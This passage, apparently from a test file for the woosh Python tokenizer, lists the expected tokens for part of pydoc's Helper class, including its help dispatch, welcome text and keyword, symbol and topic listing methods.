woosh.Token(woosh.OP, '(', 2049, 32, 2049, 33),
woosh.Token(woosh.NAME, 'request', 2049, 33, 2049, 40),
woosh.Token(woosh.OP, '.', 2049, 40, 2049, 41),
woosh.Token(woosh.NAME, 'split', 2049, 41, 2049, 46),
woosh.Token(woosh.OP, '(', 2049, 46, 2049, 47),
woosh.Token(woosh.OP, ')', 2049, 47, 2049, 48),
woosh.Token(woosh.OP, '[', 2049, 48, 2049, 49),
woosh.Token(woosh.NUMBER, '1', 2049, 49, 2049, 50),
woosh.Token(woosh.OP, ']', 2049, 50, 2049, 51),
woosh.Token(woosh.OP, ')', 2049, 51, 2049, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 2049, 52, 2050, 0),
woosh.Token(woosh.DEDENT, ' ', 2050, 0, 2050, 12),
woosh.Token(woosh.NAME, 'elif', 2050, 12, 2050, 16),
woosh.Token(woosh.NAME, 'request', 2050, 17, 2050, 24),
woosh.Token(woosh.NAME, 'in', 2050, 25, 2050, 27),
woosh.Token(woosh.NAME, 'self', 2050, 28, 2050, 32),
woosh.Token(woosh.OP, '.', 2050, 32, 2050, 33),
woosh.Token(woosh.NAME, 'symbols', 2050, 33, 2050, 40),
woosh.Token(woosh.OP, ':', 2050, 40, 2050, 41),
woosh.Token(woosh.NAME, 'self', 2050, 42, 2050, 46),
woosh.Token(woosh.OP, '.', 2050, 46, 2050, 47),
woosh.Token(woosh.NAME, 'showsymbol', 2050, 47, 2050, 57),
woosh.Token(woosh.OP, '(', 2050, 57, 2050, 58),
woosh.Token(woosh.NAME, 'request', 2050, 58, 2050, 65),
woosh.Token(woosh.OP, ')', 2050, 65, 2050, 66),
woosh.Token(woosh.NEWLINE, '\r\n', 2050, 66, 2051, 0),
woosh.Token(woosh.NAME, 'elif', 2051, 12, 2051, 16),
woosh.Token(woosh.NAME, 'request', 2051, 17, 2051, 24),
woosh.Token(woosh.NAME, 'in', 2051, 25, 2051, 27),
woosh.Token(woosh.OP, '[', 2051, 28, 2051, 29),
woosh.Token(woosh.STRING, "'True'", 2051, 29, 2051, 35),
woosh.Token(woosh.OP, ',', 2051, 35, 2051, 36),
woosh.Token(woosh.STRING, "'False'", 2051, 37, 2051, 44),
woosh.Token(woosh.OP, ',', 2051, 44, 2051, 45),
woosh.Token(woosh.STRING, "'None'", 2051, 46, 2051, 52),
woosh.Token(woosh.OP, ']', 2051, 52, 2051, 53),
woosh.Token(woosh.OP, ':', 2051, 53, 2051, 54),
woosh.Token(woosh.NEWLINE, '\r\n', 2051, 54, 2052, 0),
woosh.Token(woosh.COMMENT, '# special case these keywords since they are objects too', 2052, 16, 2052, 72),
woosh.Token(woosh.INDENT, ' ', 2053, 0, 2053, 16),
woosh.Token(woosh.NAME, 'doc', 2053, 16, 2053, 19),
woosh.Token(woosh.OP, '(', 2053, 19, 2053, 20),
woosh.Token(woosh.NAME, 'eval', 2053, 20, 2053, 24),
woosh.Token(woosh.OP, '(', 2053, 24, 2053, 25),
woosh.Token(woosh.NAME, 'request', 2053, 25, 2053, 32),
woosh.Token(woosh.OP, ')', 2053, 32, 2053, 33),
woosh.Token(woosh.OP, ',', 2053, 33, 2053, 34),
woosh.Token(woosh.STRING, "'Help on %s:'", 2053, 35, 2053, 48),
woosh.Token(woosh.OP, ')', 2053, 48, 2053, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 2053, 49, 2054, 0),
woosh.Token(woosh.DEDENT, ' ', 2054, 0, 2054, 12),
woosh.Token(woosh.NAME, 'elif', 2054, 12, 2054, 16),
woosh.Token(woosh.NAME, 'request', 2054, 17, 2054, 24),
woosh.Token(woosh.NAME, 'in', 2054, 25, 2054, 27),
woosh.Token(woosh.NAME, 'self', 2054, 28, 2054, 32),
woosh.Token(woosh.OP, '.', 2054, 32, 2054, 33),
woosh.Token(woosh.NAME, 'keywords', 2054, 33, 2054, 41),
woosh.Token(woosh.OP, ':', 2054, 41, 2054, 42),
woosh.Token(woosh.NAME, 'self', 2054, 43, 2054, 47),
woosh.Token(woosh.OP, '.', 2054, 47, 2054, 48),
woosh.Token(woosh.NAME, 'showtopic', 2054, 48, 2054, 57),
woosh.Token(woosh.OP, '(', 2054, 57, 2054, 58),
woosh.Token(woosh.NAME, 'request', 2054, 58, 2054, 65),
woosh.Token(woosh.OP, ')', 2054, 65, 2054, 66),
woosh.Token(woosh.NEWLINE, '\r\n', 2054, 66, 2055, 0),
woosh.Token(woosh.NAME, 'elif', 2055, 12, 2055, 16),
woosh.Token(woosh.NAME, 'request', 2055, 17, 2055, 24),
woosh.Token(woosh.NAME, 'in', 2055, 25, 2055, 27),
woosh.Token(woosh.NAME, 'self', 2055, 28, 2055, 32),
woosh.Token(woosh.OP, '.', 2055, 32, 2055, 33),
woosh.Token(woosh.NAME, 'topics', 2055, 33, 2055, 39),
woosh.Token(woosh.OP, ':', 2055, 39, 2055, 40),
woosh.Token(woosh.NAME, 'self', 2055, 41, 2055, 45),
woosh.Token(woosh.OP, '.', 2055, 45, 2055, 46),
woosh.Token(woosh.NAME, 'showtopic', 2055, 46, 2055, 55),
woosh.Token(woosh.OP, '(', 2055, 55, 2055, 56),
woosh.Token(woosh.NAME, 'request', 2055, 56, 2055, 63),
woosh.Token(woosh.OP, ')', 2055, 63, 2055, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 2055, 64, 2056, 0),
woosh.Token(woosh.NAME, 'elif', 2056, 12, 2056, 16),
woosh.Token(woosh.NAME, 'request', 2056, 17, 2056, 24),
woosh.Token(woosh.OP, ':', 2056, 24, 2056, 25),
woosh.Token(woosh.NAME, 'doc', 2056, 26, 2056, 29),
woosh.Token(woosh.OP, '(', 2056, 29, 2056, 30),
woosh.Token(woosh.NAME, 'request', 2056, 30, 2056, 37),
woosh.Token(woosh.OP, ',', 2056, 37, 2056, 38),
woosh.Token(woosh.STRING, "'Help on %s:'", 2056, 39, 2056, 52),
woosh.Token(woosh.OP, ',', 2056, 52, 2056, 53),
woosh.Token(woosh.NAME, 'output', 2056, 54, 2056, 60),
woosh.Token(woosh.OP, '=', 2056, 60, 2056, 61),
woosh.Token(woosh.NAME, 'self', 2056, 61, 2056, 65),
woosh.Token(woosh.OP, '.', 2056, 65, 2056, 66),
woosh.Token(woosh.NAME, '_output', 2056, 66, 2056, 73),
woosh.Token(woosh.OP, ')', 2056, 73, 2056, 74),
woosh.Token(woosh.NEWLINE, '\r\n', 2056, 74, 2057, 0),
woosh.Token(woosh.NAME, 'else', 2057, 12, 2057, 16),
woosh.Token(woosh.OP, ':', 2057, 16, 2057, 17),
woosh.Token(woosh.NAME, 'doc', 2057, 18, 2057, 21),
woosh.Token(woosh.OP, '(', 2057, 21, 2057, 22),
woosh.Token(woosh.NAME, 'str', 2057, 22, 2057, 25),
woosh.Token(woosh.OP, ',', 2057, 25, 2057, 26),
woosh.Token(woosh.STRING, "'Help on %s:'", 2057, 27, 2057, 40),
woosh.Token(woosh.OP, ',', 2057, 40, 2057, 41),
woosh.Token(woosh.NAME, 'output', 2057, 42, 2057, 48),
woosh.Token(woosh.OP, '=', 2057, 48, 2057, 49),
woosh.Token(woosh.NAME, 'self', 2057, 49, 2057, 53),
woosh.Token(woosh.OP, '.', 2057, 53, 2057, 54),
woosh.Token(woosh.NAME, '_output', 2057, 54, 2057, 61),
woosh.Token(woosh.OP, ')', 2057, 61, 2057, 62),
woosh.Token(woosh.NEWLINE, '\r\n', 2057, 62, 2058, 0),
woosh.Token(woosh.DEDENT, ' ', 2058, 0, 2058, 8),
woosh.Token(woosh.NAME, 'elif', 2058, 8, 2058, 12),
woosh.Token(woosh.NAME, 'isinstance', 2058, 13, 2058, 23),
woosh.Token(woosh.OP, '(', 2058, 23, 2058, 24),
woosh.Token(woosh.NAME, 'request', 2058, 24, 2058, 31),
woosh.Token(woosh.OP, ',', 2058, 31, 2058, 32),
woosh.Token(woosh.NAME, 'Helper', 2058, 33, 2058, 39),
woosh.Token(woosh.OP, ')', 2058, 39, 2058, 40),
woosh.Token(woosh.OP, ':', 2058, 40, 2058, 41),
woosh.Token(woosh.NAME, 'self', 2058, 42, 2058, 46),
woosh.Token(woosh.OP, '(', 2058, 46, 2058, 47),
woosh.Token(woosh.OP, ')', 2058, 47, 2058, 48),
woosh.Token(woosh.NEWLINE, '\r\n', 2058, 48, 2059, 0),
woosh.Token(woosh.NAME, 'else', 2059, 8, 2059, 12),
woosh.Token(woosh.OP, ':', 2059, 12, 2059, 13),
woosh.Token(woosh.NAME, 'doc', 2059, 14, 2059, 17),
woosh.Token(woosh.OP, '(', 2059, 17, 2059, 18),
woosh.Token(woosh.NAME, 'request', 2059, 18, 2059, 25),
woosh.Token(woosh.OP, ',', 2059, 25, 2059, 26),
woosh.Token(woosh.STRING, "'Help on %s:'", 2059, 27, 2059, 40),
woosh.Token(woosh.OP, ',', 2059, 40, 2059, 41),
woosh.Token(woosh.NAME, 'output', 2059, 42, 2059, 48),
woosh.Token(woosh.OP, '=', 2059, 48, 2059, 49),
woosh.Token(woosh.NAME, 'self', 2059, 49, 2059, 53),
woosh.Token(woosh.OP, '.', 2059, 53, 2059, 54),
woosh.Token(woosh.NAME, '_output', 2059, 54, 2059, 61),
woosh.Token(woosh.OP, ')', 2059, 61, 2059, 62),
woosh.Token(woosh.NEWLINE, '\r\n', 2059, 62, 2060, 0),
woosh.Token(woosh.NAME, 'self', 2060, 8, 2060, 12),
woosh.Token(woosh.OP, '.', 2060, 12, 2060, 13),
woosh.Token(woosh.NAME, 'output', 2060, 13, 2060, 19),
woosh.Token(woosh.OP, '.', 2060, 19, 2060, 20),
woosh.Token(woosh.NAME, 'write', 2060, 20, 2060, 25),
woosh.Token(woosh.OP, '(', 2060, 25, 2060, 26),
woosh.Token(woosh.STRING, "'\\n'", 2060, 26, 2060, 30),
woosh.Token(woosh.OP, ')', 2060, 30, 2060, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 2060, 31, 2061, 0),
woosh.Token(woosh.DEDENT, ' ', 2062, 0, 2062, 4),
woosh.Token(woosh.NAME, 'def', 2062, 4, 2062, 7),
woosh.Token(woosh.NAME, 'intro', 2062, 8, 2062, 13),
woosh.Token(woosh.OP, '(', 2062, 13, 2062, 14),
woosh.Token(woosh.NAME, 'self', 2062, 14, 2062, 18),
woosh.Token(woosh.OP, ')', 2062, 18, 2062, 19),
woosh.Token(woosh.OP, ':', 2062, 19, 2062, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 2062, 20, 2063, 0),
woosh.Token(woosh.INDENT, ' ', 2063, 0, 2063, 8),
woosh.Token(woosh.NAME, 'self', 2063, 8, 2063, 12),
woosh.Token(woosh.OP, '.', 2063, 12, 2063, 13),
woosh.Token(woosh.NAME, 'output', 2063, 13, 2063, 19),
woosh.Token(woosh.OP, '.', 2063, 19, 2063, 20),
woosh.Token(woosh.NAME, 'write', 2063, 20, 2063, 25),
woosh.Token(woosh.OP, '(', 2063, 25, 2063, 26),
woosh.Token(woosh.STRING, '\'\'\'\r\nWelcome to Python {0}\'s help utility!\r\n\r\nIf this is your first time using Python, you should definitely check out\r\nthe tutorial on the Internet at https://docs.python.org/{0}/tutorial/.\r\n\r\nEnter the name of any module, keyword, or topic to get help on writing\r\nPython programs and using Python modules. To quit this help utility and\r\nreturn to the interpreter, just type "quit".\r\n\r\nTo get a list of available modules, keywords, symbols, or topics, type\r\n"modules", "keywords", "symbols", or "topics". Each module also comes\r\nwith a one-line summary of what it does; to list the modules whose name\r\nor summary contain a given string such as "spam", type "modules spam".\r\n\'\'\'', 2063, 26, 2077, 3),
woosh.Token(woosh.OP, '.', 2077, 3, 2077, 4),
woosh.Token(woosh.NAME, 'format', 2077, 4, 2077, 10),
woosh.Token(woosh.OP, '(', 2077, 10, 2077, 11),
woosh.Token(woosh.STRING, "'%d.%d'", 2077, 11, 2077, 18),
woosh.Token(woosh.OP, '%', 2077, 19, 2077, 20),
woosh.Token(woosh.NAME, 'sys', 2077, 21, 2077, 24),
woosh.Token(woosh.OP, '.', 2077, 24, 2077, 25),
woosh.Token(woosh.NAME, 'version_info', 2077, 25, 2077, 37),
woosh.Token(woosh.OP, '[', 2077, 37, 2077, 38),
woosh.Token(woosh.OP, ':', 2077, 38, 2077, 39),
woosh.Token(woosh.NUMBER, '2', 2077, 39, 2077, 40),
woosh.Token(woosh.OP, ']', 2077, 40, 2077, 41),
woosh.Token(woosh.OP, ')', 2077, 41, 2077, 42),
woosh.Token(woosh.OP, ')', 2077, 42, 2077, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 2077, 43, 2078, 0),
woosh.Token(woosh.DEDENT, ' ', 2079, 0, 2079, 4),
woosh.Token(woosh.NAME, 'def', 2079, 4, 2079, 7),
woosh.Token(woosh.NAME, 'list', 2079, 8, 2079, 12),
woosh.Token(woosh.OP, '(', 2079, 12, 2079, 13),
woosh.Token(woosh.NAME, 'self', 2079, 13, 2079, 17),
woosh.Token(woosh.OP, ',', 2079, 17, 2079, 18),
woosh.Token(woosh.NAME, 'items', 2079, 19, 2079, 24),
woosh.Token(woosh.OP, ',', 2079, 24, 2079, 25),
woosh.Token(woosh.NAME, 'columns', 2079, 26, 2079, 33),
woosh.Token(woosh.OP, '=', 2079, 33, 2079, 34),
woosh.Token(woosh.NUMBER, '4', 2079, 34, 2079, 35),
woosh.Token(woosh.OP, ',', 2079, 35, 2079, 36),
woosh.Token(woosh.NAME, 'width', 2079, 37, 2079, 42),
woosh.Token(woosh.OP, '=', 2079, 42, 2079, 43),
woosh.Token(woosh.NUMBER, '80', 2079, 43, 2079, 45),
woosh.Token(woosh.OP, ')', 2079, 45, 2079, 46),
woosh.Token(woosh.OP, ':', 2079, 46, 2079, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 2079, 47, 2080, 0),
woosh.Token(woosh.INDENT, ' ', 2080, 0, 2080, 8),
woosh.Token(woosh.NAME, 'items', 2080, 8, 2080, 13),
woosh.Token(woosh.OP, '=', 2080, 14, 2080, 15),
woosh.Token(woosh.NAME, 'list', 2080, 16, 2080, 20),
woosh.Token(woosh.OP, '(', 2080, 20, 2080, 21),
woosh.Token(woosh.NAME, 'sorted', 2080, 21, 2080, 27),
woosh.Token(woosh.OP, '(', 2080, 27, 2080, 28),
woosh.Token(woosh.NAME, 'items', 2080, 28, 2080, 33),
woosh.Token(woosh.OP, ')', 2080, 33, 2080, 34),
woosh.Token(woosh.OP, ')', 2080, 34, 2080, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2080, 35, 2081, 0),
woosh.Token(woosh.NAME, 'colw', 2081, 8, 2081, 12),
woosh.Token(woosh.OP, '=', 2081, 13, 2081, 14),
woosh.Token(woosh.NAME, 'width', 2081, 15, 2081, 20),
woosh.Token(woosh.OP, '//', 2081, 21, 2081, 23),
woosh.Token(woosh.NAME, 'columns', 2081, 24, 2081, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 2081, 31, 2082, 0),
woosh.Token(woosh.NAME, 'rows', 2082, 8, 2082, 12),
woosh.Token(woosh.OP, '=', 2082, 13, 2082, 14),
woosh.Token(woosh.OP, '(', 2082, 15, 2082, 16),
woosh.Token(woosh.NAME, 'len', 2082, 16, 2082, 19),
woosh.Token(woosh.OP, '(', 2082, 19, 2082, 20),
woosh.Token(woosh.NAME, 'items', 2082, 20, 2082, 25),
woosh.Token(woosh.OP, ')', 2082, 25, 2082, 26),
woosh.Token(woosh.OP, '+', 2082, 27, 2082, 28),
woosh.Token(woosh.NAME, 'columns', 2082, 29, 2082, 36),
woosh.Token(woosh.OP, '-', 2082, 37, 2082, 38),
woosh.Token(woosh.NUMBER, '1', 2082, 39, 2082, 40),
woosh.Token(woosh.OP, ')', 2082, 40, 2082, 41),
woosh.Token(woosh.OP, '//', 2082, 42, 2082, 44),
woosh.Token(woosh.NAME, 'columns', 2082, 45, 2082, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 2082, 52, 2083, 0),
woosh.Token(woosh.NAME, 'for', 2083, 8, 2083, 11),
woosh.Token(woosh.NAME, 'row', 2083, 12, 2083, 15),
woosh.Token(woosh.NAME, 'in', 2083, 16, 2083, 18),
woosh.Token(woosh.NAME, 'range', 2083, 19, 2083, 24),
woosh.Token(woosh.OP, '(', 2083, 24, 2083, 25),
woosh.Token(woosh.NAME, 'rows', 2083, 25, 2083, 29),
woosh.Token(woosh.OP, ')', 2083, 29, 2083, 30),
woosh.Token(woosh.OP, ':', 2083, 30, 2083, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 2083, 31, 2084, 0),
woosh.Token(woosh.INDENT, ' ', 2084, 0, 2084, 12),
woosh.Token(woosh.NAME, 'for', 2084, 12, 2084, 15),
woosh.Token(woosh.NAME, 'col', 2084, 16, 2084, 19),
woosh.Token(woosh.NAME, 'in', 2084, 20, 2084, 22),
woosh.Token(woosh.NAME, 'range', 2084, 23, 2084, 28),
woosh.Token(woosh.OP, '(', 2084, 28, 2084, 29),
woosh.Token(woosh.NAME, 'columns', 2084, 29, 2084, 36),
woosh.Token(woosh.OP, ')', 2084, 36, 2084, 37),
woosh.Token(woosh.OP, ':', 2084, 37, 2084, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 2084, 38, 2085, 0),
woosh.Token(woosh.INDENT, ' ', 2085, 0, 2085, 16),
woosh.Token(woosh.NAME, 'i', 2085, 16, 2085, 17),
woosh.Token(woosh.OP, '=', 2085, 18, 2085, 19),
woosh.Token(woosh.NAME, 'col', 2085, 20, 2085, 23),
woosh.Token(woosh.OP, '*', 2085, 24, 2085, 25),
woosh.Token(woosh.NAME, 'rows', 2085, 26, 2085, 30),
woosh.Token(woosh.OP, '+', 2085, 31, 2085, 32),
woosh.Token(woosh.NAME, 'row', 2085, 33, 2085, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 2085, 36, 2086, 0),
woosh.Token(woosh.NAME, 'if', 2086, 16, 2086, 18),
woosh.Token(woosh.NAME, 'i', 2086, 19, 2086, 20),
woosh.Token(woosh.OP, '<', 2086, 21, 2086, 22),
woosh.Token(woosh.NAME, 'len', 2086, 23, 2086, 26),
woosh.Token(woosh.OP, '(', 2086, 26, 2086, 27),
woosh.Token(woosh.NAME, 'items', 2086, 27, 2086, 32),
woosh.Token(woosh.OP, ')', 2086, 32, 2086, 33),
woosh.Token(woosh.OP, ':', 2086, 33, 2086, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 2086, 34, 2087, 0),
woosh.Token(woosh.INDENT, ' ', 2087, 0, 2087, 20),
woosh.Token(woosh.NAME, 'self', 2087, 20, 2087, 24),
woosh.Token(woosh.OP, '.', 2087, 24, 2087, 25),
woosh.Token(woosh.NAME, 'output', 2087, 25, 2087, 31),
woosh.Token(woosh.OP, '.', 2087, 31, 2087, 32),
woosh.Token(woosh.NAME, 'write', 2087, 32, 2087, 37),
woosh.Token(woosh.OP, '(', 2087, 37, 2087, 38),
woosh.Token(woosh.NAME, 'items', 2087, 38, 2087, 43),
woosh.Token(woosh.OP, '[', 2087, 43, 2087, 44),
woosh.Token(woosh.NAME, 'i', 2087, 44, 2087, 45),
woosh.Token(woosh.OP, ']', 2087, 45, 2087, 46),
woosh.Token(woosh.OP, ')', 2087, 46, 2087, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 2087, 47, 2088, 0),
woosh.Token(woosh.NAME, 'if', 2088, 20, 2088, 22),
woosh.Token(woosh.NAME, 'col', 2088, 23, 2088, 26),
woosh.Token(woosh.OP, '<', 2088, 27, 2088, 28),
woosh.Token(woosh.NAME, 'columns', 2088, 29, 2088, 36),
woosh.Token(woosh.OP, '-', 2088, 37, 2088, 38),
woosh.Token(woosh.NUMBER, '1', 2088, 39, 2088, 40),
woosh.Token(woosh.OP, ':', 2088, 40, 2088, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 2088, 41, 2089, 0),
woosh.Token(woosh.INDENT, ' ', 2089, 0, 2089, 24),
woosh.Token(woosh.NAME, 'self', 2089, 24, 2089, 28),
woosh.Token(woosh.OP, '.', 2089, 28, 2089, 29),
woosh.Token(woosh.NAME, 'output', 2089, 29, 2089, 35),
woosh.Token(woosh.OP, '.', 2089, 35, 2089, 36),
woosh.Token(woosh.NAME, 'write', 2089, 36, 2089, 41),
woosh.Token(woosh.OP, '(', 2089, 41, 2089, 42),
woosh.Token(woosh.STRING, "' '", 2089, 42, 2089, 45),
woosh.Token(woosh.OP, '+', 2089, 46, 2089, 47),
woosh.Token(woosh.STRING, "' '", 2089, 48, 2089, 51),
woosh.Token(woosh.OP, '*', 2089, 52, 2089, 53),
woosh.Token(woosh.OP, '(', 2089, 54, 2089, 55),
woosh.Token(woosh.NAME, 'colw', 2089, 55, 2089, 59),
woosh.Token(woosh.OP, '-', 2089, 60, 2089, 61),
woosh.Token(woosh.NUMBER, '1', 2089, 62, 2089, 63),
woosh.Token(woosh.OP, '-', 2089, 64, 2089, 65),
woosh.Token(woosh.NAME, 'len', 2089, 66, 2089, 69),
woosh.Token(woosh.OP, '(', 2089, 69, 2089, 70),
woosh.Token(woosh.NAME, 'items', 2089, 70, 2089, 75),
woosh.Token(woosh.OP, '[', 2089, 75, 2089, 76),
woosh.Token(woosh.NAME, 'i', 2089, 76, 2089, 77),
woosh.Token(woosh.OP, ']', 2089, 77, 2089, 78),
woosh.Token(woosh.OP, ')', 2089, 78, 2089, 79),
woosh.Token(woosh.OP, ')', 2089, 79, 2089, 80),
woosh.Token(woosh.OP, ')', 2089, 80, 2089, 81),
woosh.Token(woosh.NEWLINE, '\r\n', 2089, 81, 2090, 0),
woosh.Token(woosh.DEDENT, ' ', 2090, 0, 2090, 12),
woosh.Token(woosh.DEDENT, '', 2090, 12, 2090, 12),
woosh.Token(woosh.DEDENT, '', 2090, 12, 2090, 12),
woosh.Token(woosh.NAME, 'self', 2090, 12, 2090, 16),
woosh.Token(woosh.OP, '.', 2090, 16, 2090, 17),
woosh.Token(woosh.NAME, 'output', 2090, 17, 2090, 23),
woosh.Token(woosh.OP, '.', 2090, 23, 2090, 24),
woosh.Token(woosh.NAME, 'write', 2090, 24, 2090, 29),
woosh.Token(woosh.OP, '(', 2090, 29, 2090, 30),
woosh.Token(woosh.STRING, "'\\n'", 2090, 30, 2090, 34),
woosh.Token(woosh.OP, ')', 2090, 34, 2090, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2090, 35, 2091, 0),
woosh.Token(woosh.DEDENT, ' ', 2092, 0, 2092, 4),
woosh.Token(woosh.DEDENT, '', 2092, 4, 2092, 4),
woosh.Token(woosh.NAME, 'def', 2092, 4, 2092, 7),
woosh.Token(woosh.NAME, 'listkeywords', 2092, 8, 2092, 20),
woosh.Token(woosh.OP, '(', 2092, 20, 2092, 21),
woosh.Token(woosh.NAME, 'self', 2092, 21, 2092, 25),
woosh.Token(woosh.OP, ')', 2092, 25, 2092, 26),
woosh.Token(woosh.OP, ':', 2092, 26, 2092, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 2092, 27, 2093, 0),
woosh.Token(woosh.INDENT, ' ', 2093, 0, 2093, 8),
woosh.Token(woosh.NAME, 'self', 2093, 8, 2093, 12),
woosh.Token(woosh.OP, '.', 2093, 12, 2093, 13),
woosh.Token(woosh.NAME, 'output', 2093, 13, 2093, 19),
woosh.Token(woosh.OP, '.', 2093, 19, 2093, 20),
woosh.Token(woosh.NAME, 'write', 2093, 20, 2093, 25),
woosh.Token(woosh.OP, '(', 2093, 25, 2093, 26),
woosh.Token(woosh.STRING, "'''\r\nHere is a list of the Python keywords. Enter any keyword to get more help.\r\n\r\n'''", 2093, 26, 2096, 3),
woosh.Token(woosh.OP, ')', 2096, 3, 2096, 4),
woosh.Token(woosh.NEWLINE, '\r\n', 2096, 4, 2097, 0),
woosh.Token(woosh.NAME, 'self', 2097, 8, 2097, 12),
woosh.Token(woosh.OP, '.', 2097, 12, 2097, 13),
woosh.Token(woosh.NAME, 'list', 2097, 13, 2097, 17),
woosh.Token(woosh.OP, '(', 2097, 17, 2097, 18),
woosh.Token(woosh.NAME, 'self', 2097, 18, 2097, 22),
woosh.Token(woosh.OP, '.', 2097, 22, 2097, 23),
woosh.Token(woosh.NAME, 'keywords', 2097, 23, 2097, 31),
woosh.Token(woosh.OP, '.', 2097, 31, 2097, 32),
woosh.Token(woosh.NAME, 'keys', 2097, 32, 2097, 36),
woosh.Token(woosh.OP, '(', 2097, 36, 2097, 37),
woosh.Token(woosh.OP, ')', 2097, 37, 2097, 38),
woosh.Token(woosh.OP, ')', 2097, 38, 2097, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 2097, 39, 2098, 0),
woosh.Token(woosh.DEDENT, ' ', 2099, 0, 2099, 4),
woosh.Token(woosh.NAME, 'def', 2099, 4, 2099, 7),
woosh.Token(woosh.NAME, 'listsymbols', 2099, 8, 2099, 19),
woosh.Token(woosh.OP, '(', 2099, 19, 2099, 20),
woosh.Token(woosh.NAME, 'self', 2099, 20, 2099, 24),
woosh.Token(woosh.OP, ')', 2099, 24, 2099, 25),
woosh.Token(woosh.OP, ':', 2099, 25, 2099, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 2099, 26, 2100, 0),
woosh.Token(woosh.INDENT, ' ', 2100, 0, 2100, 8),
woosh.Token(woosh.NAME, 'self', 2100, 8, 2100, 12),
woosh.Token(woosh.OP, '.', 2100, 12, 2100, 13),
woosh.Token(woosh.NAME, 'output', 2100, 13, 2100, 19),
woosh.Token(woosh.OP, '.', 2100, 19, 2100, 20),
woosh.Token(woosh.NAME, 'write', 2100, 20, 2100, 25),
woosh.Token(woosh.OP, '(', 2100, 25, 2100, 26),
woosh.Token(woosh.STRING, "'''\r\nHere is a list of the punctuation symbols which Python assigns special meaning\r\nto. Enter any symbol to get more help.\r\n\r\n'''", 2100, 26, 2104, 3),
woosh.Token(woosh.OP, ')', 2104, 3, 2104, 4),
woosh.Token(woosh.NEWLINE, '\r\n', 2104, 4, 2105, 0),
woosh.Token(woosh.NAME, 'self', 2105, 8, 2105, 12),
woosh.Token(woosh.OP, '.', 2105, 12, 2105, 13),
woosh.Token(woosh.NAME, 'list', 2105, 13, 2105, 17),
woosh.Token(woosh.OP, '(', 2105, 17, 2105, 18),
woosh.Token(woosh.NAME, 'self', 2105, 18, 2105, 22),
woosh.Token(woosh.OP, '.', 2105, 22, 2105, 23),
woosh.Token(woosh.NAME, 'symbols', 2105, 23, 2105, 30),
woosh.Token(woosh.OP, '.', 2105, 30, 2105, 31),
woosh.Token(woosh.NAME, 'keys', 2105, 31, 2105, 35),
woosh.Token(woosh.OP, '(', 2105, 35, 2105, 36),
woosh.Token(woosh.OP, ')', 2105, 36, 2105, 37),
woosh.Token(woosh.OP, ')', 2105, 37, 2105, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 2105, 38, 2106, 0),
woosh.Token(woosh.DEDENT, ' ', 2107, 0, 2107, 4),
woosh.Token(woosh.NAME, 'def', 2107, 4, 2107, 7),
woosh.Token(woosh.NAME, 'listtopics', 2107, 8, 2107, 18),
woosh.Token(woosh.OP, '(', 2107, 18, 2107, 19),
woosh.Token(woosh.NAME, 'self', 2107, 19, 2107, 23),
woosh.Token(woosh.OP, ')', 2107, 23, 2107, 24),
woosh.Token(woosh.OP, ':', 2107, 24, 2107, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 2107, 25, 2108, 0),
woosh.Token(woosh.INDENT, ' ', 2108, 0, 2108, 8),
woosh.Token(woosh.NAME, 'self', 2108, 8, 2108, 12),
woosh.Token(woosh.OP, '.', 2108, 12, 2108, 13),
woosh.Token(woosh.NAME, 'output', 2108, 13, 2108, 19),
woosh.Token(woosh.OP, '.', 2108, 19, 2108, 20),
woosh.Token(woosh.NAME, 'write', 2108, 20, 2108, 25),
woosh.Token(woosh.OP, '(', 2108, 25, 2108, 26),
woosh.Token(woosh.STRING, "'''\r\nHere is a list of available topics. Enter any topic name to get more help.\r\n\r\n'''", 2108, 26, 2111, 3),
woosh.Token(woosh.OP, ')', 2111, 3, 2111, 4),
woosh.Token(woosh.NEWLINE, '\r\n', 2111, 4, 2112, 0),
woosh.Token(woosh.NAME, 'self', 2112, 8, 2112, 12),
woosh.Token(woosh.OP, '.', 2112, 12, 2112, 13),
woosh.Token(woosh.NAME, 'list', 2112, 13, 2112, 17),
woosh.Token(woosh.OP, '(', 2112, 17, 2112, 18),
woosh.Token(woosh.NAME, 'self', 2112, 18, 2112, 22),
woosh.Token(woosh.OP, '.', 2112, 22, 2112, 23),
woosh.Token(woosh.NAME, 'topics', 2112, 23, 2112, 29),
woosh.Token(woosh.OP, '.', 2112, 29, 2112, 30),
woosh.Token(woosh.NAME, 'keys', 2112, 30, 2112, 34),
woosh.Token(woosh.OP, '(', 2112, 34, 2112, 35),
woosh.Token(woosh.OP, ')', 2112, 35, 2112, 36),
woosh.Token(woosh.OP, ')', 2112, 36, 2112, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 2112, 37, 2113, 0),
woosh.Token(woosh.DEDENT, ' ', 2114, 0, 2114, 4),
woosh.Token(woosh.NAME, 'def', 2114, 4, 2114, 7),
woosh.Token(woosh.NAME, 'showtopic', 2114, 8, 2114, 17),
woosh.Token(woosh.OP, '(', 2114, 17, 2114, 18),
woosh.Token(woosh.NAME, 'self', 2114, 18, 2114, 22),
woosh.Token(woosh.OP, ',', 2114, 22, 2114, 23),
woosh.Token(woosh.NAME, 'topic', 2114, 24, 2114, 29),
woosh.Token(woosh.OP, ',', 2114, 29, 2114, 30),
woosh.Token(woosh.NAME, 'more_xrefs', 2114, 31, 2114, 41),
woosh.Token(woosh.OP, '=', 2114, 41, 2114, 42),
woosh.Token(woosh.STRING, "''", 2114, 42, 2114, 44),
woosh.Token(woosh.OP, ')', 2114, 44, 2114, 45),
